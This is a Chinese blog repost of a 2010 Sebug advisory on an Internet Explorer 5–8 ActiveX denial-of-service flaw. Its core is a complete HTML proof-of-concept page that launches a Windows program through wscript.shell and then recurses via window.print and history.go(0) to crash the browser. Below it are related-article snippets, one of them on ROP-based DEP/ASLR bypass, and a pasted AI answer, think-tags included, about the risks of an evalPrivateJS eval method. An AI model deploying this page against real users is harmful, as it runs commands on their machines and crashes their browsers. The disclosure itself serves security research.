Internet Explorer 无限循环拒绝服务漏洞

最新推荐文章于 2025-07-12 10:59:24 发布

原创最新推荐文章于 2025-07-12 10:59:24 发布 · 494 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#internet #function #windows #浏览器 #shell #2010

本文介绍了一个影响Internet Explorer 5至8版本的ActiveX控件漏洞，该漏洞允许攻击者通过恶意网页远程执行任意Windows命令并导致浏览器崩溃。文章提供了漏洞触发的示例代码，并建议用户禁用ActiveX控件自动运行。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

SSV ID: 19286

SEBUG-Appdir: Internet Explorer

发布时间:2010-03-18

信息提交: liscker (liscker_at_hotmail.com)

影响版本:

Internet Explorer 5
Internet Explorer 6
Internet Explorer 7
Internet Explorer 8

漏洞描述:

该漏洞存在于ActiveX控件中.
攻击者可以构造恶意页面诱使用户访问，恶意代码可运行任何Windows命令，消耗大量内存，导致访问者IE浏览器崩溃。

<*参考

http://sebug.net

测试方法:

[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

<html>
<title>Liscker@hotmail.com</title>
<head>
<script type="text/javascript">
function sucks()
{
var shell=new ActiveXObject("wscript.shell");
shell.Run("calc", 1);
}
function asheesh()
{
sucks();
window.onerror=new Function("history.go(0)");
window.print();
asheesh();
}
asheesh();
</script>
</head>
<body onLoad="asheesh()"></body>
</html>

SEBUG安全建议:

禁止ActiveX控件自动运行。
不要手工运行该类控件运行。

// sebug.net [2010-03-18]

// http://sebug.net/vulndb/19286/

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

URnotFish

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

浏览器漏洞利用实战

悦分享

10-04

312

C++对象的前4字节存放了指向虚表的指针，如果我们用指向Shellcode的值覆盖了这个指针，调用任何对象的虚函数都会最终执行我们的Shellcode。首先是DEP的绕过。在XP SP3的IE中可以利用msvcrt.dll的代码段来提供Gadget，同时，msvcrt.dll还是一个没有开启ASLR的模块，因此如果所有的ROP Gadget全部来自没有开启ASLR模块，那么既可以绕过DEP，又可以绕过ASLR（不要忘了在Windows 7的IE8上，该漏洞也能触发，Win7中是开启了ASLR的）。

41、SMTP安全：漏洞、攻击与防御策略

jj890的博客

07-08

本文详细探讨了SMTP协议的安全问题，包括常见的漏洞类型如缓冲区溢出、蠕虫攻击和应用程序级拒绝服务攻击，分析了邮件欺骗、身份冒充以及数据完整性破坏等威胁，并提出了全面的防御策略，如反垃圾邮件控制、反病毒扫描、内容签名、SMTP头剥离等，旨在帮助组织构建更安全的邮件系统。

参与评论您还未登录，请先登录后发表或查看评论

Microsoft IE 浏览器中Frameset远程拒绝服务漏洞

冷血书生的专栏

06-08

812

受影响系统： Microsoft Internet Explorer 6.0 SP2不受影响系统： Microsoft Internet Explorer 7 Beta 2描述： Microsoft Internet Explorer是微软发布的非常流行的WEB浏览器。Microsoft IE处理畸形网页时存在漏洞，远程攻击者可以通过诱骗用户访问恶意的WEB页面导致IE崩溃。

Web下的拒绝服务漏洞(DoS)

yggcwhat

09-29

2759

Web下的拒绝服务漏洞(DoS)

Windows写字板HTML帮助文件处理远程代码执行漏洞

URnotFish的专栏

03-19

786

关于xss攻击学习的总结

weixin_30532759的博客

06-01

486

渗透测试漏洞大全

2301_76786857的博客

06-13

1617

由于开发人员编写源码，开放着将可重复使用的代码插入到单个的文件中，并在需要的时候将它们包含在特殊的功能代码文件中，然后包含文件中的代码会被解释执行。应用需要对输入进行检查，不允许用户直接提交未经过验证的数据到服务器，因为这些数据来不可编辑的控件，或者用户没有前端提交的权限，任何可编辑控件必须有阻止恶意的写入或修改的功能。网站登录失败、账号注册、密码找回等功能，有些网站会提示类似“用户名不存在”的错误，攻击者可以通过该提示先猜测出系统存在哪些账号，然后再进一步猜测密码，降低了暴力破解的成本。

Fuzzing-模糊测试--强制性安全漏洞发掘.docx

02-09

2006年，微软公司的多个产品如Internet Explorer、Word和Excel等，通过模糊测试发现了大量的安全漏洞。 #### 技术背景模糊测试技术的发展伴随着一系列工具的诞生及其在不同场景中的广泛应用。这些工具和技术的...

24、金融服务开发者的互联网入门指南

moon9的博客

07-12

本文是一份关于金融服务开发者如何利用互联网技术的全面指南，从信息高速公路的起源到互联网技术的应用场景，涵盖电子邮件、FTP、Telnet、万维网等技术。文章分析了金融服务机构在互联网时代的机遇与挑战，并结合Network Software Associates和First Union Corporation的案例，探讨了互联网技术的实际应用与效果。同时，文章展望了未来金融科技的发展趋势，并提出应对策略和行动路线图，帮助金融服务机构在互联网时代实现高效发展。

百度某系统登陆页面跨站及CSRF漏洞

swordheart的博客

04-15

1767

漏洞详情披露状态： 2010-07-25：细节已通知厂商并且等待厂商处理中 1970-01-01：厂商已经确认，细节仅向厂商公开 1970-01-11：细节向核心白帽子及相关领域专家公开 1970-01-21：细节向普通白帽子公开 1970-01-31：细节向实习白帽子公开 2010-08-25：细节向公众公开简要描述：百度某系统登陆页面存在跨站及CSRF漏洞。详细说明： http://data.baidu.com:80/report/accounts/checkLogin?

联众世界某网站SQL注射漏洞

swordheart的博客

04-16

3263

漏洞详情披露状态： 2010-07-26：细节已通知厂商并且等待厂商处理中 1970-01-01：厂商已经确认，细节仅向厂商公开 1970-01-11：细节向核心白帽子及相关领域专家公开 1970-01-21：细节向普通白帽子公开 1970-01-31：细节向实习白帽子公开 2010-08-26：细节向公众公开简要描述：联众世界某网站存在SQL注射漏洞，并支持UNION。详细说明： http://mgame.ourgame.com/user_look.aspx?ID=axyy

IE8 -- 此网页上的问题导致 Internet explore 关闭并重新打开该选项卡

weixin_33835103的博客

03-28

3612

提醒一：此网页上的问题导致 Internet explore 关闭并重新打开该选项卡提醒二：在网站导致失败或崩溃时，Internet Explorer 将尝试还原此网站。它将在尝试两次之后停止，以避免无限循环。提醒三：为了有利于保护安全性，Internet Explorer 已限制此网页运行可以访问计算机的脚本或ActiveX控件。请单击这里获取选项。 ...

IE浏览器提示网站还原错误

槿梵梵博客

07-01

2940

网上找了很多的方法，重置浏览器设置，降低自定义安全级别，添加受信任站点、禁用加载项、清除历史缓存记录等皆无用。一、解决方法重启电脑之后，再访问问题就能解决了。该方法仅个人实验得出来...

在浏览器访问 Oracle EBS 应用程序踩坑记

kikiwhq的专栏

03-01

7953

在浏览器访问 Oracle EBS 应用程序踩坑记

Internet Explorer 已不再尝试还原此网站。该网站看上去仍有问题。

最新发布

07-22

<think>我们被要求解释evalPrivateJS的用途及安全性。从用户提供的引用代码来看，这是一个C#方法，它创建了一个JavaScript引擎来执行传入的JavaScript代码。具体来说，它定义了一个名为Eval的函数，该函数将传入的代码字符串中的"eval"替换为空字符串，然后执行替换后的代码。最后，它使用MSScriptControl.ScriptControl来运行这个自定义的Eval函数。然而，用户提到了“evalPrivateJS”，这可能在上下文中指的是一个自定义的函数或方法，用于在私有（安全）环境中执行JavaScript代码。但根据引用代码，我们实际看到的是一个名为Eval的方法，它内部使用了JavaScript引擎来执行代码。因此，我们将围绕这个引用的代码来讨论evalPrivateJS（即这里的Eval方法）的用途和安全性。 ### 1. evalPrivateJS的用途从引用的代码中，我们可以推断出`Eval`方法（可能用户称之为evalPrivateJS）的主要用途是：在C#应用程序中执行传入的JavaScript代码。具体步骤包括： - 在JavaScript引擎中定义一个名为`Eval`的函数，该函数会移除传入代码字符串开头的"eval"（如果有的话），然后使用JavaScript的`eval`函数执行剩余代码。 - 在C#中，通过`MSScriptControl.ScriptControl`创建一个JavaScript运行环境，添加上述自定义函数的代码，然后调用该函数并传入用户提供的JavaScript代码字符串。这种机制通常用于： - 在C#应用程序中动态执行JavaScript逻辑，例如处理一些在客户端（浏览器）中通常由JavaScript完成的任务。 - 作为脚本扩展机制，允许用户通过JavaScript代码自定义应用程序行为。 ### 2. 安全性分析使用`eval`或类似机制执行动态代码具有很高的安全风险，尤其是在执行不可信代码时。以下是具体分析： #### 2.1 主要风险 - **代码注入攻击**：如果传入的字符串来自不可信源（如用户输入），攻击者可能注入恶意代码。例如，攻击者可以传入一段删除系统文件的命令（如果环境允许访问文件系统）或执行其他危险操作。 - **环境暴露**：JavaScript引擎通常可以访问其宿主环境（这里是C#应用程序）的某些资源。如果未正确隔离，攻击者可能利用此访问权限进行破坏。 - **拒绝服务（DoS）**：恶意代码可能通过无限循环或大量消耗内存/CPU资源导致应用程序崩溃或性能下降。 #### 2.2 引用代码中的特定风险 - **移除"eval"前缀的副作用**：代码中定义了一个自定义函数，它移除传入代码字符串开头的"eval"，然后执行剩余部分。这可能导致原本被包裹在字符串或其他结构中的代码被意外执行。例如，如果传入的字符串是`"eval('alert(1)')"`，替换后变为`('alert(1)')`，然后执行会弹出1。但更危险的是，如果传入的字符串是`"eval; while(true){}"`，移除"eval"后变成一个无限循环，导致DoS。 - **使用过时的MSScriptControl**：`MSScriptControl.ScriptControl`是一个较老的组件，它依赖于Internet Explorer的JavaScript引擎（JScript）。这可能导致兼容性问题，且该引擎可能不支持现代JavaScript特性。此外，旧引擎可能存在已知的安全漏洞。 #### 2.3 安全实践建议 1. **避免执行不可信代码**：绝对不要执行来自不可信来源（如用户输入、外部网络）的代码。如果必须执行，应严格限制代码来源（例如，仅允许管理员或可信用户提供代码）。 2. **沙箱隔离**：在可能的情况下，将代码执行环境与主应用程序隔离。例如，在单独的AppDomain或进程中运行脚本，并限制其权限。但注意，.NET中的沙箱机制（如AppDomain）在.NET Core中已不再支持，因此需要考虑其他隔离技术（如进程隔离）。 3. **资源限制**：设置脚本执行超时和资源配额（如最大内存使用、CPU时间），以防止DoS攻击。 4. **代码审查与白名单**：如果动态执行是必要的，考虑使用白名单机制，只允许执行预定义的安全操作或使用安全的脚本语言（如Lua）。 5. **使用更安全的替代方案**：考虑使用更现代的、设计上更安全的JavaScript引擎，如V8（通过ClearScript等库）或Node.js，它们提供更好的隔离和资源控制。 ### 3. 总结 evalPrivateJS（如引用代码所示）的主要用途是在C#应用程序中执行JavaScript代码，但其安全性非常脆弱。直接执行任意代码字符串是极其危险的操作，应尽可能避免。如果必须使用，务必采取严格的安全措施，如隔离环境、资源限制和代码审查。 §§相关问题§§ 1. 如何在C#中安全地执行JavaScript代码？ 2. 除了MSScriptControl，还有哪些库可以在C#中运行JavaScript？ 3. 如何防止JavaScript代码执行时的无限循环问题？</think>### evalPrivateJS 的用途及安全性分析 #### 1. **核心用途** evalPrivateJS 主要用于在 **受控环境内执行动态 JavaScript 代码**，典型场景包括： - **脚本扩展机制**：允许应用程序动态加载并执行自定义逻辑（如插件系统）[^1] - **数据处理引擎**：解析并执行用户提交的数学表达式或业务规则（如公式计算器） - **沙箱测试环境**：在隔离环境中验证 JavaScript 代码行为（如在线代码编辑器） #### 2. **安全性风险** 虽然引用代码通过 `MSScriptControl.ScriptControl` 创建了执行环境，但仍存在显著风险： | 风险类型 | 具体表现 | 危害等级 | |-------------------|--------------------------------------------------------------------------|----------| | **代码注入** | 未过滤的 `stringjs` 参数可能包含恶意代码（如 `process.exit()`） | ⚠️ 高危 | | **沙箱逃逸** | 通过原型链污染访问宿主环境（如调用 `ActiveXObject` 操作本地文件） | ⚠️ 高危 | | **资源滥用** | 死循环或内存爆炸代码（如 `while(true){}`）导致服务拒绝 | ⚠️ 中危 | | **依赖劫持** | 旧版 `MSScriptControl` 存在未修复漏洞（如 CVE-2006-1319） | ⚠️ 中危 | #### 3. **安全实践建议** 若要安全使用类似机制： 1. **输入净化** ```javascript // 过滤危险函数/关键字 const safeString = stringjs.replace(/(process\.exit|ActiveXObject)/gi, "") ``` 2. **资源隔离** - 使用独立 AppDomain 或容器化环境运行脚本 - 设置超时终止机制：`js.Timeout = 5000; // 5秒超时`[^1] 3. **最小权限原则** ```csharp // 禁用危险功能 js.AllowUI = false; js.UseSafeSubset = true; // 限制JS语法集 ``` 4. **替代方案** - 使用安全沙箱库（如 `vm2` for Node.js） - 解析器替代执行器（如 `math.js` 替代 `eval()` 计算表达式） > 📌 **关键结论**：evalPrivateJS 在**非受信输入场景下应严格避免**。必须使用时需结合多层防御策略，并优先选用现代沙箱技术替代传统 ActiveX 组件。